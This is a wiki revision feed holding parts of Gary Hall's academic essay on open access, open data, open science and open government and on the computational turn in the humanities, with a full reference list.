seen as part of the larger shift in contemporary society which Lyotard associates with the widespread use of computers and databases, and with the exteriorization of knowledge in relation to the ‘knower’. As we have seen, it is a movement away from a concern with ideals, with what is right and just and true, and toward a concern to legitimate power by optimizing the system’s performance in instrumental, functional terms. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; All of this raises some rather significant and timely questions for the humanities. Is it merely a coincidence that such a turn toward science, computing and data-intensive research is gaining momentum at a time when the UK government is emphasizing the importance of the STEM subjects (science, technology, engineering and medicine) and withdrawing support and funding from the humanities? Or is one of the reasons all this is happening now due to the fact that the humanities, like the sciences themselves, are under pressure from government, business, management, industry and increasingly the media to prove they provide value for money in instrumental, functional, performative terms? Is the interest in computing a strategic decision on the part of some of those in the humanities? As the project of Cohen and Gibbs shows, one can get funding from the likes of Google (D. Cohen, 2010). In fact, in the summer of 2010 [http://www.nytimes.com/2010/11/17/arts/17digital.html?_r=1&amp;amp;hp=&amp;amp;pagewanted=all ‘Google awarded $1 million to professors doing digital humanities research’] (P. Cohen, 2010). To what extent is the take-up of practical techniques and approaches from computing science providing some areas of the humanities with a means of defending (and refreshing) themselves in an era of global economic crisis and severe cuts to higher education, through the transformation of their knowledge and learning into quantities of information –- so-called ‘deliverables’? Can we even position the ‘computational turn’ as an event created to justify such a move on the part of certain elements within the humanities ([http://coventryuniversity.podbean.com/2010/11/09/open-software-and-digital-humanities-federica-frabetti/ Frabetti], 2010)? &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Where does all this leave us as far as this Living Book on open science is concerned? As the argument above hopefully demonstrates, it is clearly not enough just to attempt to reveal or recover the scientific truth about, say, the environment, to counter the disinformation of others involved in the likes of the Climategate controversy. Nor is it enough merely to make the scientific research openly accessible to the public. Equally, it is not satisfactory simply to make the information, data, and associated tools, techniques and resources freely available to those in the humanities, so they can collectively and collaboratively search, mine, map, graph, model, visualize, analyse and interpret it in new ways – including some that may make it less abstract and easier for the majority of those in society to understand and follow – and, in doing so, help bridge the gap between the ‘two cultures’. It is not so much that there is a lack of information, or access to the right kind of information, or information presented in the right kind of way to ensure that the message of the scientific research and data comes across effectively and efficiently. It is not even that there is too much information, too much white noise, as ‘Bifo’ et al call it (2009: 141-142). To be sure, as a [http://oxygen.mintel.com/sinatra/reports/display/id=479774 2010 Mintel report] showed – to stay with the example of climate change – most people in the UK already know what is happening to the environment. They are just suffering from Green Fatigue, they are bored with thinking about it and thus enacting a backlash against what they perceive as ‘extreme’ pressure from environmentalist groups. This is perhaps one reason why [http://www.independent.co.uk/environment/climate-change/green-fatigue-hits-campaign-to-reduce-carbon-footprint-2102585.html ‘the number of cars on UK roads has risen from just over 26million in 2005 to more than 31 million in 2009’] (Shields, 2010: 30). Yet to argue there is too much information rather risks implying that there is a proper amount of information, and what would that be?&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; So we might not want to go along with Gilles Deleuze and Felix Guattari when they contend that ‘we do not lack communication. On the contrary, we have too much of it’. But we might nevertheless agree with them when they argue that what we actually lack is creation: ‘We lack resistance to the present’ (1994: 108). In this respect, it is not just a case of supplying more scientific research and data; nor of making the research and data that has otherwise been closed, hidden, denied or suppressed openly available for free – by opening the already existing memory and databanks to the people, for example (which is what Lyotard ended by suggesting we do). It is also a case of creating work around the research and data that does not simply go along with the shift in the status and nature of knowledge that is currently taking place. As we have seen, it is a shift toward STEM subjects and away from the humanities; toward a concern with optimizing the social system’s performance in instrumental, functional terms, and away from a concern with questions of what is just and right; and toward an emphasis on openness, freedom and transparency, and away from what is capable of disrupting and disturbing society, and what, in remaining resistant to a culture of measurement and calculation, maintains a much needed element of inaccessibility, inefficiency, delay, error, antagonism, heterogeneity and dissensus within the system. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Can this Living Book on open science be considered one such a creation? And can this series of Living Books about Life be considered another? Are they instances of a resistance to the present? Or just more white noise? &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; (The above is based on a paper presented at the Data Landscapes, AHRC network event, held in conjunction with the British Antarctic Survey at the University of Westminster, London, December 15, 2010. An earlier version of some of the material provided above appeared in Hall [2010]) &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; '''References''' &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Arthur, C. (2010), ‘Will Brussels Curb Google Guys’, ''The Guardian'', December 6. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; 'Bifo' Berardi, F., Jacquemet, M. and Vitali, G. (2009), ''Ethereal Shadows: Communications and Power in Contemporary Italy''. Brooklyn, New York: Autonomedia. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Bergman, M. K. (2001), ‘The Deep Web: Surfacing Hidden Value’, ''JEP: The Journal of Electronic Publishing'', vol.7, no.1, August. http://quod.lib.umich.edu/cgi/t/text/text-idx?c=jep;view=text;rgn=main;idno=3336451.0007.104.&amp;amp;nbsp;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Birchall, C. (2011) 'There's Been Too Much Secrecy in this City&amp;quot;: The False Choice Between Secrecy and Transparency in US Politics,' ''Cultural Politics''&amp;amp;nbsp;7(1), March: 133-156.&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;Birchall, C (2011b forthcoming) ‘Transparency, Interrupted: Secrets of the Left’, Between Transparency and Secrecy', Annual Review, ''Theory, Culture and Society, ''December.&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Blair, T. (2010), ''A Journey''. London: Hutchinson. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Clinton, H. (2010), ‘Internet Freedom: The Prepared Text of U.S. of Secretary of State Hillary Rodham Clinton's speech, delivered at the Newseum in Washington, D.C., January 21. http://www.foreignpolicy.com/articles/2010/01/21/internet_freedom?page=full &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Cohen, D. (2010), ‘Searching for the Victorians’, ''Dan Cohen'', October 4. http://www.dancohen.org/2010/10/04/searching-for-the-victorians/?utm_source=feedburner&amp;amp;amp;utm_medium=feed&amp;amp;amp;utm_campaign=Feed%3A+DanCohen+%28Dan+Cohen%29&amp;amp;amp;utm_content=Google+Reader. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Cohen, P. (2010) ‘Digital Keys for Unlocking the Humanities’ Riches’, ''The New York Times'', November 16. http://www.nytimes.com/2010/11/17/arts/17digital.html?_r=1&amp;amp;amp;hp=&amp;amp;amp;pagewanted=all. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Croxall, B. (2010) response to Tanner Higgen, ‘Cultural Politics, Critique, and the Digital Humanities’, ''Gaming the System''. September 10. http://www.tannerhiggin.com/2010/05/cultural-politics-critique-and-the-digital-humanities/. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Deleuze G. and Guattari, F. (1988) ''A Thousand Plateaus: Capitalism and Schizophrenia''. London: Athlone. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Deleuze G. and Guattari, F. (1994), ''What is Philosophy?''. New York: Columbia University Press. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Fung, A., Graham, M., Weil, D. (2007), ''Full Disclosure: The Perils and Promise of Transparency''. Cambridge: Cambridge University Press. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Frabetti, F. (2010) ‘Digital Again? The Humanities Between the Computational Turn and Originary Technicity’, talk given to the Open Media Group, Coventry School of Art and Design. November 9. http://coventryuniversity.podbean.com/2010/11/09/open-software-and-digital-humanities-federica-frabetti/. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Franklin, K. D. and Rodriguez’G, K. (2008) ‘The Next Big Thing in Humanities, Arts and Social Science Computing: Cultural Analytics’,''HPC Wire''. July 29. http://www.hpcwire.com/features/The_Next_Big_Thing_in_Humanities_Arts_and_Social_Science_Computing_Cultural_Analytics.html. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Gibbs, R. (2010), Presidential press secretary, cited in ‘White House condemns WikiLeaks' release’, ''MCNBC.com News'', November 28. http://www.msnbc.msn.com/id/40405589/ns/us_news-security. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Gurstein, M. (2010a), ‘Open Data: Empowering the Empowered or Effective Data Use for Everyone?’, ''Gurstein’s Community Infomatics'', September, 2. http://gurstein.wordpress.com/2010/09/02/open-data-empowering-the-empowered-or-effective-data-use-for-everyone/. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Gurstein, M. (2010b), ‘Open Data (2): Effective Data Use’, ''Gurstein’s Community Infomatics'', September, 9. http://gurstein.wordpress.com/2010/09/09/open-data-2-effective-data-use/ &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Gurstein, M. (2011), ‘Are the Open Data Warriors Fighting for Robin Hood or the Sheriff?: Some Reflections on OKCon 2011 and the Emerging Data Divide’, posting to the nettime mailing list, July, 5. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Hall, G. (2010), 'We Can Know It For You: The Secret Life of Metadata', ''How We Became Metadata''. London: Institute for Modern and Contemporary Culture, University of Westminster. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Higgen, T. (2010) ‘Cultural Politics, Critique, and the Digital Humanities’, ''Gaming the System''. May 25. http://www.tannerhiggin.com/2010/05/cultural-politics-critique-and-the-digital-humanities/. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Hindman, M. (2009), ''The Myth of Digital Democracy''. Princeton, NJ and Oxford: Princeton University Press. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Hoffman, M. (2010), ‘EFF Posts Documents Detailing Law Enforcement Collection of Data From Social Media Sites’, ''Electronic Frontier Foundation''. March 16. http://www.eff.org/deeplinks/2010/03/eff-posts-documents-detailing-law-enforcement. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Houghton, J. (2009) ‘Open Access - What are the Economic Benefits?: A Comparison of the United Kingdom, Netherlands and Denmark’, Centre for Strategic Economic Studies, Victoria University, Melbourne. http://www.knowledge-exchange.info/Admin/Public/DWSDownload.aspx?File=%2fFiles%2fFiler%2fdownloads%2fOA_What_are_the_economic_benefits_-_a_comparison_of_UK-NL-DK__FINAL_logos.pdf. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Jarvis, J. (2010), ‘Time For Citizens of the Internet to Stand Up’, ''The Guardian: MediaGuardian'', March 29. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; JISC (2009), ‘Press Release: Open Science - the future for research?, posting to the BOAI list, November 16. 2009. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Kerssens, N. and Dekker A. (2009), ‘Interview with Lev Manovich for Archive 2020’, ''Virtueel_ Platform''. http://www.virtueelplatform.nl/#2595. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Knouf, N. (2010), ‘The JJPS Extension: Presenting Academic Performance Information’, ''Journal of Journal Performance Studies'', Vol 1, No 1. Available at http://journalofjournalperformancestudies.org/journal/index.php/jjps/article/view/6/6. Accessed 20 June, 2010. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Latour, B (2004), ‘Why Has Critique Run Out of Steam? From Matters of Fact to Matters of Concern”’, ''Critical Inquiry'', Vol. 30, Number 2. http://www.uchicago.edu/research/jnl-crit-inq/issues/v30/30n2.Latour.html. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Liu, A. (2011) ‘Where is Cultural Criticism in the Digital Humanities’. Paper presented at the panel on ‘The History and Future of the Digital Humanities’” Modern Language Association convention, Los Angeles, January 7. http://liu.english.ucsb.edu/where-is-cultural-criticism-in-the-digital-humanities. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Lyotard, J-F. (1986), ''The Postmodern Condition: A Report on Knowledge''. Manchester: Manchester University Press. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Lyotard, J.-F. (1991) ''The Inhuman: Reflections on Time''. Cambridge: Polity. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Manovich, L. (2010a) ‘Cultural Analytics Lectures by Manovich in UK (London and Swansea), March 8-9, 2010’, ''Software Studies Initiative''. March 8. http://lab.softwarestudies.com/2010/03/cultural-analytics-lecture-by-manovich.html. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Manovich, L. (2011) ‘Trending: The Promises and the Challenges of Big Social Data’,''Lev Manovich'', April 28: http://www.manovich.net/DOCS/Manovich_trending_paper.pdf. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Meeks, E. (2010), ‘The Digital Humanities as Imagined Community’, ''Digital Humanities Specialist''. September 14. https://dhs.stanford.edu/the-digital-humanities-as/the-digital-humanities-as-imagined-community/. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Mintel report, ‘Energy Efficiency in the Home - UK - July 2010’. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Murray, S. Choi, S., Hoey, J., Kendall, C., Maskalyk, J., and Palepu, A. (2008), ‘Open Science, Open Access and Open Source Software at ''Open Medicine''’, ''Open Medicine'', 2(1): e1–e3. http://www.ncbi.nlm.nih.gov/pmc/articles/PMC3091592/?tool=pmcentrez http://www.ncbi.nlm.nih.gov/pmc/articles/PMC3091592/pdf/OpenMed-02-e1.pdf??tool=pmcentrez &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Patterson, M. (2009), ‘Article-Level Metrics at PloS – Addition of Usage Data’, ''PLoS: Public Library of Science''. September 16. http://blogs.plos.org/plos/2009/09/article-level-metrics-at-plos-addition-of-usage-data/. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Pubget (2010), ‘[BOAI] PLoS Launches Fast (Open) PDF Access with Pubget’, posted on the BOAI list by Peter Suber, March 8. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Poynder, R. (2010), ‘Interview With Jean-Claude Bradley: The Impact of Open Notebook Science’, ''Information Today'', September. http://www.infotoday.com/IT/sep10/Poynder.shtml. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Scheinfeldt, T. (2008), ‘Sunset for Ideology, Sunrise for Methodology?’, ''Found History'', March 13. http://www.foundhistory.org/2008/03/13/sunset-for-ideology-sunrise-for-methodology/ &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Scheinfeldt, T. (2010a) ‘Where’s the Beef?: Does Digital Humanities Have to Answer Questions?’, ''Found History'', March 13. http://www.foundhistory.org/2010/05/12/wheres-the-beef-does-digital-humanities-have-to-answer-questions/. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Scheinfeldt, T. (2010b) response to Dan Cohen, ‘Searching for the Victorians’, ''Dan Cohen''. October 5. http://www.dancohen.org/2010/10/04/searching-for-the-victorians/?utm_source=feedburner&amp;amp;amp;utm_medium=feed&amp;amp;amp;utm_campaign=Feed%3A+DanCohen+%28Dan+Cohen%29&amp;amp;amp;utm_content=Google+Reader. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Shields, R. (2010), ‘Green Fatigue Hits Campaign to Reduce Carbon Footprint’, ''The Independent'', October 10. http://www.independent.co.uk/environment/climate-change/green-fatigue-hits-campaign-to-reduce-carbon-footprint-2102585.html. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Sterling, B. (2005), ''Shaping Things''. Massachussetts: MIT. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Stolberg, S. G. (2009), ‘On First Day, Obama Quickly Sets a New Tone’”, ''The New York Times''. January 21. http://www.nytimes.com/2009/01/22/us/politics/22obama.html. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Swan, A. (2009), ‘Open Access and Open Data’, ''2nd NERC Data Management Workshop'', Oxford. February 17-18. http://eprints.ecs.soton.ac.uk/17424/. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Swartz, A. (2010), ‘When is Transparency Useful?’ ''Aaron Swartz’s Raw Thought blog'', February 11. http://www.aaronsw.com/weblog/usefultransparency. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Vaidhyanathan, S. (2009), ‘The Googlization of Universities’, ''The NEA 2009 Almanac of Higher Education''. http://www.nea.org/assets/img/PubAlmanac/ALM_09_06.pdf &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Wark, M. (2004), ''A Hacker Manifesto''. Harvard: Harvard University Press. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Westcott, S. (2009) ‘Global Warming: Brits Deny Humans are to Blame,’ ''The Express'', December 7. http://www.express.co.uk/posts/view/144551/Global-warming-Brits-deny-humans-are-to-blame &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; The White House (2009), ‘Memorandum for the Heads of Executive Departments and Agencies: Transparency and Open Government’. January 21. http://www.whitehouse.gov/the_press_office/TransparencyandOpenGovernment/ &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Wollen, P. and Cooke, L. eds (1995), ''Visual Display: Culture Beyond Appearances''. Seattle: Bay Press.&lt;/div&gt;</summary>
		<author><name>Garyhall</name></author>
	</entry>
	<entry>
		<id>https://livingbooksaboutlife.org/wiki/index.php?title=Open_science/Introduction&amp;diff=5501</id>
		<title>Open science/Introduction</title>
		<link rel="alternate" type="text/html" href="https://livingbooksaboutlife.org/wiki/index.php?title=Open_science/Introduction&amp;diff=5501"/>
		<updated>2013-11-03T14:51:00Z</updated>

		<summary type="html">&lt;p&gt;Garyhall: /* Gary Hall */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[http://www.livingbooksaboutlife.org/books/Digitize_Me,_Visualize_Me,_Search_Me Back to the book] &amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
= '''White Noise: On the Limits of Openness (Living Book Mix)'''  =&lt;br /&gt;
&lt;br /&gt;
= Gary Hall  =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &amp;lt;youtube&amp;gt;PH54cp2ggFk&amp;lt;/youtube&amp;gt; &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; One of the explicit aims of the Living Books About Life series is to provide a 'bridge' or point of connection, translation, even interrogation and contestation, between the humanities and the sciences. Accordingly, this introduction to ''Digitize Me, Visualize Me, Search Me'' takes as its starting point the so-called ‘computational turn’ to data-intensive scholarship in the humanities. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; The phrase ‘[http://www.thecomputationalturn.com/ the computational turn]’ has been adopted to refer to the process whereby techniques and methodologies drawn from (in this case) ''computer science'' and related fields – including science visualization, interactive information visualization, image processing, network analysis, statistical data analysis, and the management, manipulation and mining of data – are being used to produce new ways of approaching and understanding texts in the humanities; what is sometimes thought of as ‘the digital humanities’. The concern in the main has been with either digitizing ‘born analog’ humanities texts and artifacts (e.g. making annotated editions of the art and writing of [http://www.blakearchive.org/blake/ William Blake] available to scholars and researchers online), or gathering together ‘born digital’ humanities texts and artifacts (videos, websites, games, photography, sound recordings, 3D data), and then taking complex and often extremely large-scale data analysis techniques from computing science and related fields and applying them to these humanities texts and artifacts - to this ‘big data’, as it has been called. Witness Lev Manovich and the Software Studies Initiative’s use of ‘[http://www.manovich.net/DOCS/Manovich_trending_paper.pdf digital image analysis and new visualization techniques]’ to study ‘20,000 pages of Science and Popular Science magazines… published between 1872-1922, 780 paintings by van Gogh, 4535 covers of Time magazine (1923-2009) and one million manga pages’ (Manovich, 2011), and Dan Cohen and Fred Gibb’s text mining of ‘[http://www.dancohen.org/2010/10/04/searching-for-the-victorians/?utm_source=feedburner&amp;amp;utm_medium=feed&amp;amp;utm_campaign=Feed%3A+DanCohen+%28Dan+Cohen%29&amp;amp;utm_content=Google+Reader the 1,681,161 books that were published in English in the UK in the long nineteenth century]’ (Cohen, 2010). &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; ''What Digitize Me, Visualize Me, Search Me'' endeavours to show is that such data-focused transformations in research can be seen as part of a major alteration in the status and nature of knowledge. It is an alteration that, according to the philosopher Jean-François Lyotard, has been taking place since at least the 1950s, and involves nothing less than a shift away from a concern with questions of what is right and just, and toward a concern with legitimating power by optimizing the social system’s performance in instrumental, functional terms. This shift has significant consequences for our idea of knowledge. Indeed, for Lyotard: &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;The nature of knowledge cannot survive unchanged within this context of general transformation. It can fit into the new channels, and become operational, only if learning is translated into quantities of information. We can predict that anything in the constituted body of knowledge that is not translatable in this way will be abandoned and that the direction of new research will be dictated by the possibility of its eventual results being translatable into computer language. The ‘producers’ and users of knowledge must now, and will have to, possess the means of translating into these language whatever they want to invent or learn. Research on translating machines is already well advanced. Along with the hegemony of computers comes a certain logic, and therefore a certain set of prescriptions determining which statements are accepted as ‘knowledge’ statements. (1986: 4)&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; In particular, ''Digitize Me, Visualize Me, Search Me'' suggests that the turn in the humanities toward data-driven scholarship, science visualization, statistical data analysis, etc. can be placed alongside all those discourses that are being put forward at the moment - in both the academy and society - in the name of greater openness, transparency, efficiency and accountability. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; '''Open Access ''' &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; The open access movement provides a case in point. Witness [http://www.knowledge-exchange.info/Admin/Public/DWSDownload.aspx?File=%2fFiles%2fFiler%2fdownloads%2fOA_What_are_the_economic_benefits_-_a_comparison_of_UK-NL-DK__FINAL_logos.pdf John Houghton’s] 2009 comparison of the benefits of OA for the United Kingdom, Netherlands and Denmark, which claims to show that the open access academic publishing model, in which peer reviewed scholarly research and publications are made available for free online to all those who are able to access the Internet, is actually the most cost effective mechanism for scholarly publishing. Others meanwhile have detailed the increases open access publishing enables in the amount of material that can be published, searched and stored, in the number of people who can access it, in the impact of that material, the range of its distribution, and in the speed and ease of reporting and information retrieval. The following announcement, posted on the BOAI (Budapest Open Access Initiative) list in March 2010, is fairly typical in this respect: &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Today PLoS released Pubget links across its journal sites. Now, when users are browsing thousands of reference citations on PLoS journals they will be able to get to the full text article faster than ever before. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Specifically, when readers encounter citations to articles as recorded by CrossRef (which are accessed via the ‘CrossRef’ link in the ‘Cited in’ section of any article’s Metrics tab), a PDF icon will also appear if it is freely available via Pubget. Clicking on the icon will take you directly to the PDF. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; On launching this new functionality, Pete Binfield, Publisher of PLoS ONE and the Community Journals said: ‘Any service, like Pubget, that makes it easier for authors to quickly find the information they need is a welcome addition to our articles. We like how Pubget helps to break down content walls in science, letting users get instantly to the article-level detail that they seek.’ (Pubget, 2010)&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; '''Open Data ''' &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Yet it is not just the research literature that is positioned as being rendered more accessible by scientists. Even the data created in the course of scientific research is promoted as being made freely and openly available for others to use, analyse and build upon.This includes data sets that are too large to be included in any resulting peer-reviewed publications. Known as open data, or data-sharing, this initiative is motivated by the idea that publishing data online on an open basis bestows it with a [http://eprints.ecs.soton.ac.uk/17424/1/Swan_-_NERC_09.pptx ‘vastly increased utility’]. Digital data sets are said to be ‘easily passed around’; they are seemingly ‘more easily reused’, reanalysed and checked for accuracy and validity; and they supposedly contain more ‘opportunities for educational and commercial exploitation’ (Swan, 2009). &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Interestingly, certain academic publishers are already viewing the linking of their journals to the underlying data as another of the ‘value-added’ services they can offer, to set alongside automatic alerting and sophisticated citation, indexing, searching and linking facilities (and to no doubt help ward off the threat of disintermediation posed by the development of digital technology, which enables academics to take over the means of dissemination and publish their work for and by themselves cheaply and easily). Significantly, a [http://www.jisc.ac.uk/publications/documents/opensciencerpt.aspx 2009 JISC report] also identified ‘open-ness, predictive science based on massive data volumes and citizen involvement as [all] being important features of tomorrow’s research practice’. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; In a further move in this direction, all Public Library of Science (PLoS) journals are now providing a broad range of article-level metrics and indicators relating to usage data on an open basis. No longer withheld as trade secrets, these metrics reveal which articles are attracting the most views, citations from the scholarly literature, social bookmarks, coverage in the media, comments, responses, ‘star’ ratings, blog coverage, and so on. PLoS has positioned this programme as enabling science scholars to assess [http://blogs.plos.org/plos/2009/09/article-level-metrics-at-plos-addition-of-usage-data/ ‘research articles on their own merits rather than on the basis of the journal (and its impact factor) where the work happens to be published’], and they encourage readers to carry out their own analyses of this open data (Patterson, 2009). Yet it is difficult not to perceive such article-level metrics and management tools as also being part of the wider process of transforming knowledge and learning into ‘quantities of information’ (Lyotard, 1986: 4); quantities, furthermore, that are produced more to be exchanged, marketed and sold (1986: 4) – for example, by individual academics to their departments, institutions, funders and governments in the form of indicators of ‘quality’ and ‘impact’ (1986: 5). &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; '''From Open Science to Open Government ''' &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Such developments around open access and open data are themselves part of the larger trend or phenomenon that is coming to be known as ‘open science’. As Murray et al put it: &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Open science is emerging as a collaborative and transparent approach to research. It is the idea that all data (both published and unpublished) should be freely available, and that private interests should not stymie its use by means of copyright, intellectual property rights and patents. It also embraces open access publishing and open source software… (Murray et al, 2008)&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; One of the most interesting and well known examples of how such open science may work is provided by the Open Notebook Science of the organic chemist Jean-Claude Bradley. ‘[I]in the interests of openness’, Bradley is making the [http://www.infotoday.com/IT/sep10/Poynder.shtml ‘details of every experiment done in his lab freely available on the web']. This ‘includes all the data generated from these experiments too, even the failed experiments’. What is more, he is doing so in ‘real time’, ‘within hours of production, not after the months or years involved in peer review’ (Poynder, 2010). Again, we can see how emphasis is being placed on the amount of research that can be shared, and the speed with which this can be achieved. This openness on Bradley’s part is also positioned as a means of achieving usefulness and impact, as is evident from the very title of one of his Open Notebook Science projects, [http://usefulchem.wikispaces.com/ UsefulChem]. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; To be fair, however, such discourses around openness, transparency, efficiency and utility are not confined to the sciences – or even the university, for that matter. There are also wider political initiatives, dubbed ‘Open Government’, or ‘Government 2.0’, with both the Labour and the Conservative/Liberal Democrat coalition administrations in the UK making a great display of freeing government information. The Labour government implemented the Freedom of Information (FOI) Act in 2000, and then proceeded to launch a [http://www.data.gov.uk website] expressly dedicated to the release of governmental data sets in January 2010. It is a website that the current Conservative/Liberal Democrat coalition government continues to make extensive use of. In a similar vein, the [http://www.freeourdata.org.uk/ Guardian] newspaper has campaigned for the UK government to relinquish its copyright on all local, regional and national data collected with taxpayers’ money and to make such data freely and openly available to the public by publishing it online, where it can be collectively and collaboratively scrutinized, searched, mined, mapped, graphed, cross-tabulated, visualized, audited and interpreted using software tools. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Nor is this phenomenon confined to the UK. In the United States Barack Obama promised throughout his election campaign to make government more open. He followed this up by issuing a memorandum on transparency the very first day after he became President, vowing to make openness one of [http://www.nytimes.com/2009/01/22/us/politics/22obama.html ‘the touchstones of this presidency’”] (Obama, cited in Stolberg, 2009): ‘[http://www.whitehouse.gov/the_press_office/TransparencyandOpenGovernment/ My Administration] is committed to creating an unprecedented level of openness in Government. We will work together to ensure the public trust and establish a system of transparency, public participation, and collaboration. Openness will strengthen our democracy and promote efficiency and effectiveness in Government’ (The White House, 2009). &amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; '''The Politics of Openness''' &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; The connection I am making here between the movements for open access, open data, open science and open government is one that has to a certain extent already been pointed to by Michael Gurstein in his reflections on the experience of attending the 2011 conference of the [http://okfn.org/ Open Knowledge Foundation]. For Gurstein: &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;[http://gurstein.wordpress.com/2011/07/03/are-the-open-data-warriors-fighting-for-robin-hood-or-the-sheriff-some-reflections-on-okcon-2011-and-the-emerging-data-divide/ the ‘open data/open government’ movement] begins from a profoundly political perspective that government is largely ineffective and inefficient (and possibly corrupt) and that it hides that ineffectiveness and inefficiency (and possible corruption) from public scrutiny through lack of transparency in its operations and particularly in denying to the public access to information (data) about its operations. And further that this access once available would give citizens the means to hold bureaucrats (and their political masters) accountable for their actions. In doing so it would give these self-same citizens a platform on which to undertake (or at least collaborate with) these bureaucrats in certain key and significant activities—planning, analyzing, budgeting that sort of thing. Moreover through the implementation of processes of crowdsourcing this would also provide the bureaucrats with the overwhelming benefits of having access to and input from the knowledge and wisdom of the broader interested public. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Put in somewhat different terms but with essentially the same meaning—it’s the taxpayer’s money and they have the right to participate in overseeing how it is spent. Having “open” access to government’s data/information gives citizens the tools to exercise that right. (Gurstein, 2011)&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
